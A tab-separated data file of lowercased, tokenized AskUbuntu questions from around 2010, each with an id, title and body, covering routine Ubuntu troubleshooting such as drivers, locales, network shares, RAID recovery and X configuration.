11103	video download problem for download manager in 9.10	my requirement is to download various videos from different websites : youtube meta cafe vimeo others no matter what download manager i use : kget uget downloader for x videos are not able to download only some strange `` watch '' file of some kb size is downloaded. '' i copy and paste the url of the video to the `` my system is ubuntu 9.10
11109	can the kernel update itself via the update manager ?	i noticed that the date of the currenlty installed linux kernel revision/version is later than the system 's install date . 2.6.32-24-generic # /var/log/installer/syslog 2.6.32-25-generic # uname -r these figures seem to answer my own question , but what surprises me is that i do n't remember a dramatic `` you must reboot windows now ! '' dialog , which i 've grown to expect for such a deep system change ... maybe i just clicked ok ..windows style : ) is the kernel somehow able to `` replace '' itself ? ... or maybe it can only do `` minor surgery '' ? eg . could i still be running `` lucid '' in 2020 with each `` latest '' kernel being installed via updates . ( i 'm not going to do that ; it 's just a test scenario . )
11111	touchpad is weird after reboot from windows	i 'm dualbooting ubuntu and win7 ( though i must admit i can count the number of times i 've used win7 during the last 6 months on one hand ) . my laptop is a acer travelmate 8471 . one thing i noticed after the last time i rebooted in to ubuntu were that my touchpad were acting a bit weird . usually i scroll with two fingers ( same on win7 ) , but suddenly my mouse would just jump around and send a lot of weird keypresses at the same time , when i tried to scroll . i tried having a look at the settings in the synclient , but everything seemed to be the same . i turned the touchpad off and then on , tried messing around with a lot of settings , but nothing seemed to help the two-finger scroll problem . then i rebooted my computer , but the problem was still there . at last i turned the computer off , waited 5 seconds and turned it on again . and all of a sudden my touchpad worked just as good as before . this is happening every time i reboot from win7 , in to ubuntu , and the only thing that fixes it , is to turn off the laptop , and then turn it on again ( no waiting required ) . my guess is that the synaptics driver on win7 does something to the touchpad , that is not reset before a complete power off . have anyone gotten any suggestions ?
11116	how do i convert music between formats and keep its metadata ?	i tried to use sound converter to convert several folders of files from .m4a to .mp3 format and lost all file metadata in the conversion . i used ubuntu 10.04 lts with sound converter 1.4.4-2 . is this expected ? should i be using another program to perform this function on ubuntu ?
11122	does ubuntu one sync only the changed parts of a file ?	are there plans to get u1 syncing only changes in files ? it seems like anytime i listen to a sync 'd song , it re-uploads the whole song instead of just the ( very small ) part where banshee incremented the listens count and what ever else happens when i listen . if i remember correctly , dropbox handles this more gracefully . does anyone have any answer about plans like this for u1 ?
11126	certain media wont work	recently , my computer stopped being able to play mp4 , 3pg , avi , mkv , and more media . vlc will get it to work , nothing else does , and when i try to play it with the normal player it always tries to find codecs to install , when just yesterday everything worked fine
11129	replace first line in text file by i-th line from another text file	can i do the following in the terminal ? ( written in pseudo-code ) for ( int i=1 ; i < =5 ; i++ ) { replace first line of fileout.text by i-th line of filein.txt } i guess it somehow involves using sed , but i do n't know how to sed from one file to another . edit : i frame htorque 's answer inside a loop : for ( ( i = 1 ; i < = 10 ; i++ ) ) ; do line= $ ( sed -n `` $ { i } p '' filein.txt ) sed -i `` 1c\\ $ line '' fileout.txt done which works like a charm . it is possible to replace the fixed string '10 ' in the counter by the actual number of lines of filein.txt : nline= $ ( sed -n ' $ = ' filein.txt ) for ( ( i = 1 ; i < = $ nline ; i++ ) ) ; do line= $ ( sed -n `` $ { i } p '' filein.txt ) sed -i `` 1c\\ $ line '' fileout.txt done
11130	how can i convert a ppt to a pdf from the command line ?	i have a folder containing a bunch of ppts , each of which i 'd like to convert to an individual pdf . i 'm using ubuntu 10.04 with whatever comes installed on it .
11132	is it possible to create bootable usb stick on 512 mb flash drive ?	i have only 512 mb flash drive . is it possible to create bootable maverick 10.10 on it ? maybe , with some packages dropped ? what tool can i try for it ?
11133	how to add icon of device on unity launcher ?	my hdd is separated on three parts , two of them are on nfts , and the only way to reach some of this parts is through trash icon on unity launcher to start nautilus . is it any way to put ntfs parts of the disk on the unity launcher ?
11135	can i install maverick 's sound menu in lucid ?	luci runs better for me , without many annoying bugs , but i like the sound menu from maverick . can i install it in lucid , without upgrading ?
11136	how does using 'apt-get install ' affect reverse dependencies ?	if libfoo is pulled in by the package bar , and i upgrade it by executing apt-get install libfoo , how will this affect reverse dependencies ? if i then remove the package bar , will libfoo still be removed by apt-get autoremove ?
11147	setting up daap in banshee	ok , so i can see and listen to music libraries from other computers on my network via banshee ( they are running rhythmbox with daap enabled ) but i can not see my banshee library from them . i have daap enabled in plugins ( on banshee ) .
11149	the font of gnome suddenly became weird	i 'm using ubuntu 10.04 . the font of gnome became very weird when i surfed the internet . i have used it for several months since the 10.04 is released . and i always install all the updates . it 's the first time to meet such problem . i 'm wondering what 's the root cause .
11153	why do dist upgrades still have to freeze and ask questions ?	i left my dist upgrade ( from netbook edition 10.04 to 10.10 ) running overnight and i wake up to see it frozen at some ridiculous question about replacing a config file . why ca n't they still get this right ? do n't pause and ask questions ! ! is n't ubuntu supposed to be for average usrs ? how is an average user supposed to know the `` right '' answer to such a question ? if the developers really feel they have to offer this flexibility , at least ask a question at the beginning of the upgrade like `` when there are config file conflicts , should we stop and ask you about it or just make our best guess ? ''
11160	home network printer recommendations	i 'm looking to buy a new printer to share between an ubuntu 10.10 laptop and windows vista computer . i 'm after something : fairly cheap ( < =âł100 ) ; with either wired or wireless networking ; that works out of the box with ubuntu ; from any manufacturer . i 've seen a lot of recommendations for hp gear , but whenever i try to check compatibility of the latest bunch of hp officejets on the ubuntu wiki , there 's either no entry or just `` needs retesting '' . can anyone suggest a good printer ?
11161	how make all programs close to the notification-area like rhythmbox does ?	i say `` close '' , not `` minimise '' . i dont want minimise to tray like some programs do , i want to close to tray , like rhythmbox does . when i close the window i want the program to remain running but be minimised to the notification-area .
11162	is it possible to alter and update the status icon of a running indicator applet ?	i 'm trying to create a simple application indicator that mimics the cpu load applet for the gnome-panel . i currently do this by updating ( overwriting ) the status icon of the indicator with the new cpu load information and re-set the status icon to the same icon on every update ( i know this is stupid , but i do n't know if it 's currently possible to solve otherwise ) . unfortunately this does n't work and i always see the `` first '' icon state , eg . the indicator icon does n't update , while the icon 's content does . i also tried to temporarily set the status icon to something else first , eg . ... update_icon ( ) indicator.set_icon ( `` indicator-messages '' ) indicator.set_icon ( `` indicator-cpu-load '' ) ... but that did n't work either . any ideas ? update : it is indeed possible to do what i wanted using a hack to cause the indicator to repaint its icon ( thanks to jorge castro and ted gould ) : ... update_icon ( ) indicator.set_status ( appindicator.status_attention ) indicator.set_status ( appindicator.status_active ) ... the attention state icon should be the same as the active state icon , else there would be some flicker .
11171	high load , but nothing running ?	i am not sure how this is even possible . looking at top , my loads are often above 2 , 3 , 4.0 , but i am over 99 % idle . there is never a process at the top that is taking up anything , all my processes are 0 . this is a new-ish i-5 laptop that was running very fast in 10.04 , but is almost un-usable in 10.10 . does anyone have any ideas ? how is the load so high with nothing running ? thanks
11180	is there a way to change the system font completely ?	is there a way to change the system font completely ? i mean i want the font from login in screen until every application follow the change .
11184	how to change user 's language ( locale ) back to english ?	i made the mistake of trying out some settings through administration - > language support . now my user account has lang set to fi_fi.utf8 , even though i want to use en_us.utf8 . ( this is kind-of a follow up to this . ) listing 1 : current locale settings for my user account : $ locale lang=fi_fi.utf8 language=en lc_ctype= '' fi_fi.utf8 '' lc_numeric= '' fi_fi.utf8 '' lc_time=en_gb.utf-8 lc_collate= '' fi_fi.utf8 '' lc_monetary= '' fi_fi.utf8 '' lc_messages= '' fi_fi.utf8 '' lc_paper=fi_fi.utf8 lc_name= '' fi_fi.utf8 '' lc_address= '' fi_fi.utf8 '' lc_telephone= '' fi_fi.utf8 '' lc_measurement=fi_fi.utf8 lc_identification= '' fi_fi.utf8 '' lc_all= listing 2 : /etc/default/locale which contains the locale settings i want to use : $ cat /etc/default/locale lang= '' en_us.utf8 '' lc_time= '' en_gb.utf-8 '' lc_paper= '' fi_fi.utf8 '' lc_measurement= '' fi_fi.utf8 '' the administration - > language support settings look like this : my specific questions : where exactly ( in what file ) are the user-specific locale settings ( listing 1 ) stored ? what is the recommended way of changing that ? by editing a file or through some config ui ? ( i want to use the settings in listing 2 . ) the root annoyance which prompted me to ask this : how to change firefox ui language from finnish back to english ? i 'm using ubuntu 10.04 if that makes any difference .
11185	enabling or installing network access tools in nautilus	recently i had done remove -- purge blue-tooth manager as my laptop does n't have blue-tooth device . now when i try to access a windows share from ubuntu i get this error . can not display `` smb : //192.168.0.10 '' nautilus can not handle `` smb '' locations . when i open places - > connect to server no options under service type : custom location ( for example : samba , ftp , ssh ) are listed . it 's completely empty . how can i get those network tools back in nautilus ? edit 1 : here is the output of the command posted by oli in the comments : gvfs install gvfs-bin install gvfs-fuse install libgnome-vfs2.0-cil install libgnome2-vfs-perl install libgnomevfs2-0 install libgnomevfs2-common install libgnomevfs2-extra install libgvfscommon0 install libnautilus-extension1 install nautilus install nautilus-data install nautilus-image-converter install nautilus-sendto install nautilus-sendto-empathy install nautilus-share install
11189	how to use xdmcp+gdm and xnest ?	i have been trying to enable xdmcp on gdm without much success . following some instructions i have edited /etc/gdm/custom.conf and added : [ daemon ] remotegreeter=/usr/lib/gdm/gdm-xdmcp-chooser-slave [ xdmcp ] enable=true then restarted gdm and tried to connect both locally and from a remote system with : xnest :1 -query localhost xnest :1 -query remote_system_hostname i just get a black screen instead of the gdm window as expected . i am missing something ?
11192	screen magnifier wrecks login screen â how to get rid of it ?	in the ubuntu / gnome login screen , i tried some of the different accessibility settings out of curiosity . big mistake ! enabling the `` use screen magnifier '' ( or whatever ) option breaks down the view horribly , and makes it impossible to even access the settings again : yes , i tried to access every corner of the screen using the mouse , but there 's just chaos everywhere . fortunately , i can still log in ( pressing `` esc '' makes the normal login dialog appear on the left-hand monitor ) . my question is , how to disable the `` magnifier '' option outside of the login screen itself ? ( by editing some config file perhaps ? ) i do n't care about getting the magnifier mode to work properly - just make it go away altogether , please .
11201	attaching a windows network drive on ubuntu	i 've been setting up a dev machine over the last week and i want to be able to network the drive on my host windows server machine , using hyper v , to my guest ubuntu server machine . server address is \\srv file share is \\srv\public_html and is accessed on my guest windows xp machine for shared verification . any links or suggestions would be awesome on how to do this from the terminal . update : i used this to install samba http : //www.howtogeek.com/howto/ubuntu/install-samba-server-on-ubuntu/ and , i created the cedentials file manually using sudo touch credentials as suggested by answer below
11202	translating inittab line to ubuntu 9.04 jaunty system equivalent	i 'm trying to use runit on my sheevaplug running ubuntu 9.04 jaunty . there is a helpful tutorial at techrepublic ( use runit to supervise linux services ) that walks through the process of setting it up , but it says : edit /etc/inittab and add : sv:123456 : respawn : /sbin/runsvdir-start to the bottom of the file . this will start ( and re-start , if it ever exits ) the /sbin/runsvdir-start program . i found a post saying that inittab is n't used in some ubuntu versions . i can install/use chkconfig or update-rc.d , but i do n't really know what i 'm doing or how to translate the above statement into arguments for either tool . any pointers ?
11203	usb mouse stutters periodically	i 'm using an hp dv6000 ( not sure of exact model ) with a pretty basic logitech wireless laptop mouse . from time to time , the usb mouse will be very stuttery and less responsive . not all clicks register and the motion is not smooth . it seems like it 's related to the notify-osd coming up when i get an im or email or whatever else , but it happens other times as well . it 's not the whole computer becoming less responsive , because if i use the touch pad during one of these fits , it works perfectly smooth . i 've replaced the batteries in the mouse and have tried different usb ports with better line of sight , etc . i ca n't figure out what 's going on . any thoughts ?
11205	generating an app list from the old installation to run it on the new installation	i want to shift from ubuntu-desktop 10.10 to ubuntu netbook edition 10.10 on my netbook . currently , the moment i ssh into ubuntu from my ad-hoc network , ubuntu freezes . it always requires a cold shutdown . so hoping that netbook edition may not have this issue . i have custom installed many applications on the desktop edition . so i want save the app list into a script and run the script on the new installation , so that all apps will be downloaded and installed . i need suggestions as to the best way to achieve this .
11206	how do you i find a list of softwares which are outdated and needs upgrade ?	how do i find a list of packages that are outdated and need to be upgraded using aptitude ? i am using ubuntu 10.04 .
11207	how can i set up ubuntu to install updates without asking ?	i would like to have ubuntu silently install updates every day or so . it it possible to set it to do so ? are there any potential dangers to doing things this way ?
11211	how to download flash ( streaming ) videos from sites like youtube , dailymotion , vimeo , etc . ?	i have read this thread but please hear me out . i use ubuntu 10.04 lts ( 32-bit ) and i did n't bother to install the flash plugin for firefox as i am using a netbook and sometimes flash caused firefox to crash . what i would like to ask is if i had the link to the video , is there some way i can download it and watch it offline ( via vlc ) so that i do n't need to install flash plugin ? command line or gui techniques is welcome . based on what i have read , using the /tmp technique requires flash plugin to be installed and the video to be loaded before i can go scavenge it in the said directory . note that i also want to dload videos from site aside from youtube .
11226	ubuntu netbook edition and automatic login	i 'm trying to set up the automatic login , but i ca n't choose the user which must be loged in . here a screenshot ( german is set as default language ) : any suggestion , how to solve the problem ? i 'm using une 10.10 , upgraded from 10.04 ...
11234	how can i play a system sound with python ?	i am writing a small reminder-app and want to play a system sound once the timer has reached 0 . what is the easiest way to play that sound , and which sound would you recommend ?
11237	installing gtk development environment	not new to ubuntu or programming but i am new to programming in c and gtk . have been using quickly for the odd program . i want to play around with c and gtk . what gtk packages do i need to install to have a working development environment with c ?
11240	why is the automatic login disabled for users with encrypted home ?	i 've tried to setup an autologin , but that is n't possible , because my home is encrypted . what are the reasons for this ? ps . here i have described my problem : http : //askubuntu.com/questions/11226/ubuntu-netbook-edition-and-automatic-login .
11246	i need a command to remove all files from a directory ( and subdir ) that are under 20mb	with the exception of certain file extensions . ( removing junk other than subtitle files from a video directory )
11249	correct way to apply patches to your kernel ?	i am following the instructions located here to setup my server . it states that i have to apply a patch which i 've downloaded onto the machine . my question is , the article says to use the following command : /usr/src/linux # patch -p1 < file.diff //note i replace file.diff w/ routes-2.6.36.16.diff this returns : -bash : /usr/src/linux : no such file or directory i go on to assume that /linux # should be replaced with the actual linux kernel version/dir . i 've tried this using the following command : /usr/src/linux-headers-2.6.35.22 patch -p1 < file.diff this returns the same . when i view the contents of /usr/src i only have two directories linux-headers-2.6.35.22 and linux-headers-2.6.35.22-generic-pae i need guidance as to the correct way to apply a patch to the kernel . edit if i execute /usr/src/linux-headers-2.6.35.22/ patch -p1 file.diff i get -bash : /usr/src/linux-headers-2.6.35.22 : is a directory . i need to know how i go about finding the specific file that needs to be patched here ...
11252	how do i get nvidia drivers to work with mainline ppa kernels ?	i installed the 2.6.36 kernel from http : //kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.36-maverick/ because it 's the first version to supports my soundcard ( this works ) but now i ca n't get my geforce 310m to work . i used the 256.53 version which works with 2.6.35 but that wo n't install because of mismatching gcc versions with the kernel ( yes i selected ignore but it wo n't install ) . the newer 260 version installs but i only get a black screen .
11255	unable to connect to ifolder server	i tried to install ifolder on ubuntu 10.10 server 64 bit using this guide . everything `` worked '' except : if i try to acccess the server with http : //myurl/admin i get the error-message `` unable to connect to the ifolder server . '' has anyone succeeded with this guide , or is there an ifolder specialist who could help me with the last steps ? update 1 : i could connect to the /admin-interface by not changin anything in the config-script . changing the servername in anything else than localhost brings back the error . and changing username and/or password has no affect .
11257	crazy stuff with inkscape : copy/paste and pdf	ok , so i was creating a pdf with inkscape using images from the web . i copied them and pasted them all in inkscape , nothing strange , but then every time i copied a new image to the inkscape workspace somehow the images that were already there got replaced with the image i just copied . i do n't know if it 's a feature of inkscape or something like that , or could it be ubuntu . well , i certainly do n't know what it is but it 's rather annoying . also this affects the pdf files that were already created . say i have a pdf with an image of a dog , and i click copy and choose the image of a cat , the pdf file gets edited , even when it 's not in use .
11261	unity testing process	im really excited about unity . i know youre getting alot of hate atm , but there are alot of support out there aswell : ) im wondering how the testing process for the unity that will be default in natty will work . i know i can install the current unity version in maverick , but id like to test the new one based on compiz . so will this be open to testing for everyone and when do you see something like that happening ?
11264	wifi light doesnt turn off on acer aspire one	i recently installed ubuntu netbook edition on my acer aspire one d255 netbook , and i notice that the wifi light never turns off , even if i 'm not connected to a network . when i am connected to a network , it never stops blinking . i dont remember this behaviour when windows 7 was on it . is there a way to turn this light off ? does this mean the wifi is constantly on even when not being used ?
11269	are pre-existing files in a mountpoint directory safe and uneffected ?	i 've noticed that pre-existing files in a `` mountpoint '' directory disappear when the mount command is applied ... and then they re-appear when the directory is unmounted . are these files just on `` holiday '' for the duration of the mount period ? ... are they safe ? ... and is there some way to still access them while the mount is active ?
11271	how to setup multiple wans with load balancing ?	what is the best way to setup multiple wan 's into a ubuntu distro and load balance ? i have two internet connections , one static and one dynamic and i need to combine and load balance them . i have been looking into the following method http : //www.netlife.co.za/archived-articles/12-started.html but was wondering if anyone had suggestions that were more ubuntu specific or possibly other distro 's that would work better for this .
11274	setting up proxy to ignore all local addresses	i am trying to bypass the proxy for all addresses that are local network addresses . such as http : //test/ and http : //mymachine/ and http : //hismachine/ is there an easy way to do that ?
11275	how can i get my epson v500 scanner working ?	i have a v500 scanner , but it does n't show up in simple scan . i 've turned it off and on a few times to see if that was the problem . here is the usb information : bus 002 device 008 : id 04b8:0130 seiko epson corp . perfection v500 ( gt-x770 )
11277	usb drive speed testing app with test options	i know there is a benchmark in the disk utility app , but i need something with a few more options . some of my usb drives are exhibiting weird results which may be due to testing patterns etc , so some test options would really help me out ( chunk size , flush buffer on every write , test size , data pattern / access pattern ) any suggestions ?
11286	what do the abbreviations `` etc '' and `` usr '' mean ?	i can relate to acronyms and abbreviations much more readily when i actually know how they were derrived . it is oftn pssble to wrk out wht an abrvtion means if you know the the root words behind it ... but unfortunately etc is a standard abbreviation for `` et-cetera '' ... and for usr i think of `` user '' ... but i ca n't see any correlation . most of the terse names in linux actually make sense when i finally work out the expanded original normal words behind them.. are the origins of these abbreviations lost in the mists of time , or are they `` obvious '' to all but me ? this question was promted by a comment i read yesterday , where someone described these things as linux incantations ... i sympathize with him : ) ...
11293	rebuild mdadm raid5 after os hard drive died	i have an ubuntu desktop 10.4 `` server '' with 5 hardrives . 1 of the hardrives had 3 os 's on it ( windows vista , windows xp , and ubuntu 10.4 ) . i primarily used the ubuntu os so that i could use mdadm and boxee . the other 4 hard drives were configured using mdadm in a raid5 partition . as far as i know , those 4 hard drives are fine ... but my main os hard drive has completely died . the computer wo n't boot up , obviously , without a drive with an operating system . my goal is to somehow reload an operating system onto a new hard drive that i just received from newegg.com , or to load a live cd ... and then retrieve or reassemble my mdadm raid 5 partition so i can at least get my rather huge music collection off the machine and onto an external hard drive . what [ detailed ] steps do i need to take in order to achieve this ?
11298	tool for file recover | deleted files recovery	advise me please some recovery tools for file recover | deleted files recovery | damaged files
11300	how do i test multi-gesture capabilities of a touchpad ?	i bought new laptop and i was told that my touch pad is 'multi gesture touchpad ' . i 'd like to zoom , scroll with two fingers and perform three finger operations . how do i test the multi gesture capabilities of my touchpad ?
11306	updating tomtom gps devices ?	has someone succeed in update of tomtom devices on ubuntu ? i tried with an install of windows xp sp3 in virtualbox puel , the device is correctly regognised but when i install new maps files , i have transfers errors ( delayed write failed ) . it looks like the usb device disconnect on large file transfers . can someone help me ? is there another solution on ubuntu ?
11307	reverse x11 forwarding	i was playing with my phone ( that runs a linux/x stack ) last night and i managed to ssh into my desktop and run an application and have it show up on my phone . it was awesome . today i 'd like to sort of do the opposite . i want to view an application running on my phone on my pc . i could install a ssh server on my phone but i frankly do n't fancy that purely for security reasons . i want this to be initiated from my phone . is there a way to connect from my phone and tunnel the pc 's x connection back to the phone and then run an application on the phone that show on the pc ?
11312	python 3 error when running the print command	all i wrote in the interpreter was as follows : > > > print `` hello , world ! '' file `` < stdin > '' , line 1 print `` hello , world ! '' ^ syntaxerror : invalid syntax how did i even get an error ? all i tried to do was run a print command .
11313	ca n't install tor on ubuntu netbook 10.10	i downloaded the tar.gz file from torproject .org and unzipped it . i clicked everything inside the directories but nothing happened . i also tried to install the addon from mozilla addons . the addon is installed but i ca n't see the tor button anywhere . i checked relevant the option in the preferences section of tools > addons . how do i install it ? command : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring \ /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt \ /trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver \ keyserver.ubuntu.com -- recv-keys 886ddd89 output : gpg : requesting key 886ddd89 from hkp server keyserver.ubuntu.com gpg : key 886ddd89 : public key `` deb.torproject.org archive signing key '' imported gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 )
11316	ps/2 devices stop working in 10.10 release	this is a very weird problem . i have ubuntu 10.10 x64 installed on a machine , and every ps/2 device ( more precisely mouse and keyboard ) stops working after some minutes . how can i diagnose this problem ? this is the output of lspci : 00:00.0 host bridge : intel corporation core processor dmi ( rev 11 ) 00:03.0 pci bridge : intel corporation core processor pci express root port 1 ( rev 11 ) 00:08.0 system peripheral : intel corporation core processor system management registers ( rev 11 ) 00:08.1 system peripheral : intel corporation core processor semaphore and scratchpad registers ( rev 11 ) 00:08.2 system peripheral : intel corporation core processor system control and status registers ( rev 11 ) 00:08.3 system peripheral : intel corporation core processor miscellaneous registers ( rev 11 ) 00:10.0 system peripheral : intel corporation core processor qpi link ( rev 11 ) 00:10.1 system peripheral : intel corporation core processor qpi routing and protocol registers ( rev 11 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1c.6 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 7 ( rev 06 ) 00:1c.7 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 8 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce 8400 gs ] ( rev a1 ) 03:00.0 sata controller : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 02 ) 03:00.1 ide interface : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 02 ) 07:04.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) ... and of lsusb : bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 08ec:0008 m-systems flash disk pioneers traveldrive 2c bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and , finally , a uname -a : linux ubuntu-pc 2.6.35-22-generic # 33-ubuntu smp sun sep 19 20:32:27 utc 2010 x86_64 gnu/linux
11317	what blog editor software are available ?	iâ´m searching for a good blog editor like windows live writer something similar .
11319	unable to install on an hp probook	i just received a brand new business laptop from my company . i wanted to install ubuntu on it . i resized windows 7 partition and started the installation of the 10.04 lts . however , i soon discovered a big problem that prevented me to start the installation . the issue is that the hdd is partitioned with 4 primary partitions : 2 for win 7 ( system and c : ) and 2 for hp recovery tools . due to this fact , even if i have more than 200gb of free space , i can not install a new partition , because 4 is the maximum number of primary partitions ! i 'm very disappointed about that , it seems that this partitioning scheme actually prevents a user to install a different os on the hp laptops . i thought about removing the recovery partitions , but my company did not allow me to do so . do you know if there is any other way to install ubuntu on this setup ?
11320	software for the analysis of interaction sequences ?	i am looking for a computer program for analysing sequential observational data for ubuntu . analog for gseq ( generalized sequential querier ) which include sdis ( sequential data interchange standard ) . what options do i have ?
11322	uninstall unity , rewind to old unr interface , keeping 10.10 ?	i 've upograded 10.04 to 10.10 on my netbook . the unity interface does n't work for me , it just gets in the way . i can change the gdm choice at boot to put me into good ol ' gnome , which is better than unity but not nearly as nice as the 10.04 unr . how do i install the unr interface on top of 10.10 ? is there a how to - ca n't see anything useful on the ubuntu site , everyone there is trying to pretend that unity is great .
11327	retrieving the names of files in a txt file	how to retrieve the names of files to a txt file ? ?
11330	how to run ubuntu fully in initramfs ?	i have a machine with 10 gb of ram , and i would like to run ubuntu on it ( debian also ok if its easier ) , fully in ram in such a way : i boot from a compressed image on an usb flash disk , that is uncompressed into ram , and then i can remove the disk from the usb slot , and use the system only with ram , without any permanent disk . whenever i make any changes that i want permanent , i would put the flash disk back into the usb slot ( possibly not the same one as i used initially to boot , as i would like to keep many versions of the boot flash disk ) , and run some command that would save the current state into a compressed image on the disk . how can i set this up ?
11332	unity mouse/keyboard shortcuts for `` wall '' and `` expo ''	in unity , is it possible to set up active borders or keyboard shortcuts to enable the `` wall '' and `` expo '' views ?
11333	disable ( or customize ) the `` grow '' animation for cairo dock	is there a way in which i can customize ( or disable ) the `` grow on hover '' animation in cairo dock ? i have the size set to the smallest possible and would like to disable the hover animation because it 's really annoying , and difficult to work with when enabled . in the least , i would like to be able to specify how many pixels it 'll grow when hovered over .
11334	how to extract tpb files ?	i download a dvd image from torrent , but file extension is iso-tpb . what should i do with it ? : - ?
11336	wifi speed with driver rtl8187 drops	i am using lucid lynx with this usb adapter and drivers rtl8187 . when i start a download , it starts at 1500kpbs ( if i use `` iwconfig wlan0 rate [ more than 11mb ] '' it starts at a lower speed ) , it transfers a few kbs but then the speed starts to drop constantly and nothing is being transferred . i 've also tried the driver r8187 , but i have the same speed problem only that with this driver the download starts at only 10kbps , and drops from there . what can i try to identify the cause and fix this problem ?
11340	how to generate an installable image from an existing hard-drive installation	i installed a kubuntu on a spare work computer and i am now configuring it for the standard user 's needs . my goal is , to install it on 4 rarely used pcs for them to play around with , and maybe put it on their own computer some time . there is some stuff i want to be the same on every computer ( e.g . thunderbird instead of evolution , the mail-in and mail-out server of the users ) , and stuff that needs to be customized on every machine , like ( hostname , a different user on each pc , .. ) . also , the computers have differently sized hard drives . will a 10gb image pushed onto a 300gb hard drive `` break '' the file system so it seems to be only 10gb big ? sorry , this is hard to explain in english . does anyone know of a way to generate a custom image of a full hard disk sda1 as / , sda2 as swap and sda3 as /home ? also , if i just burn the .iso on a dvd i wo n't be able to boot and push the image on the hdd , right ?
11344	oss object oriented alternatives to oracle database	i want to know if oracle style object oriented database code can be written in mysql , postgresql or any oss database softwares . i do n't want to install the massive oracle db on my ubuntu to learn minimum database programming edit1 : after installing orafce when i did the following create type addr_obj_typ as object ( street varchar2 ( 30 ) , city varchar2 ( 20 ) , state char ( 2 ) , zip number ( 5 ) ) ; and i got this error : error : syntax error at or near `` object '' line 1 : create type addr_obj_typ as object
11347	how long will the 2d gnome be available ?	i know most computers nowadays have access to decent graphical cards capable of running compiz/clutter . however , there may still be some users with old hardware . i know gnome panel will be supported for at least a few years , but what happens after that ? will you 'recommend ' ( force ) everyone with old hardware to use xubuntu or lubuntu ?
11349	indicator applet-less applications ?	since i heard that indicator applets are going to replace the notification area , i wondered what was going to happen to applications that use the notification area and do n't have an indicator applet ? is the ubuntu team going to write an indicator applet for every application out there ? you ca n't expect the developers of applications to add that ubuntu-only task to their list . do n't get me wrong , i love the indicator applets . but i 'm a little concerned about this .
11355	how do i start a second instance of a program from unity 's launcher ?	it 's all in the title . eg . if i have a gnome-terminal opened and i click on the gnome-terminal launcher icon , the running terminal will focus and no new instance will pop-up . also , there is no item in the launcher icon 's quicklist that would allow me to start a second instance of the program .
11358	resolution stuck after playing opengl game	i used to start the game , frozen throne ( using wine ) with the option of `` -opengl '' .when i entered the game , the resolution will changed , and restored after exit the game . but this time a problem happened.the resolution ca n't restore although i restart my computer several times . both the ubuntu pane and login windows are exceptional . nvidia-settingsalso detect the resolution is `` 1024 x 768 '' , but it seemed useless using this tool . screenshot-nvidia x server settings : the result of xrandr : screen 0 : minimum 320 x 240 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 50.0* 800x600 51.0 52.0 53.0 680x384 54.0 55.0 640x480 56.0 576x432 57.0 512x384 58.0 400x300 59.0 60.0 61.0 320x240 62.0 the configure of /etc/x11/xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ yellow ) fri apr 9 11:51:21 utc 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` entry graphics '' endsection section `` screen '' # removed option `` metamodes '' `` 1024x768 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1024x768_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection
